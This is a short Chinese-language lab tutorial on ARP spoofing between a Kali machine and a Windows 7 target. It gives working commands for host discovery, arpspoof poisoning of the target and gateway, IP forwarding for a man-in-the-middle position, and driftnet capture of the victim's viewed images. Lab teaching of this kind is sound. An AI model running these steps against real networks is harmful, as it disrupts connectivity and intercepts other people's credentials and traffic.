1,什么是ARP断网攻击和arp欺骗
ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网上上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机19无法正常连线。
2,实验环境
kali系统 win7系统
3,实验步骤
1,扫描局域网下的所有主机,查看有哪些ip存活状态
fping -g 192.168.0.0/24 //查看该网段下哪些ip存活
2,确认信息
本机ip:192.168.0.128 MAC:00:0c:29:19:65:b4
目标ip:192.168.0.129
网关:192.168.0.1
3,ARP攻击实操
arpspoof 是一款进行arp欺骗的工具,攻击者通过毒化受害者arp缓存,将网关mac替换为攻击者mac,然后攻击者可截获受害者发送和收到的数据包,可获取受害者账户、密码等相关敏感信息。
apt-get install dnsiff //安装arpspoof使用工具
arpspoof -i 网卡 -t 目标主机 网关 //实现arp断网攻击
验证
使用被攻击机ping外网
查看MAC地址,和网关地址一样,说明断网攻击成功
开启流量转发功能,是被攻击主机可以正常上网
修改/etc/sysctl.conf文件,使得net.ipv4.ip_forward = 1;等于0为不转发。然后更新:
# sysctl -p
arpspoof -i eth0 -t 192.168.0.129 192.168.0.1 //继续开启arp欺骗
之后验证win7系统,发现MAC地址已篡改,但可以正常上网,说明流量转发功能以开启成功
kali 中利用driftnet工具,可以捕获win7机器正在浏览的图片
Driftnet是一个监听网络流量并从它观察到的TCP流中提取图像的程序。
在命令行输入:
apt-get install driftnet //下载工具
driftnet -i eth0 //监控流量转发网卡,并实时监控目标上网情况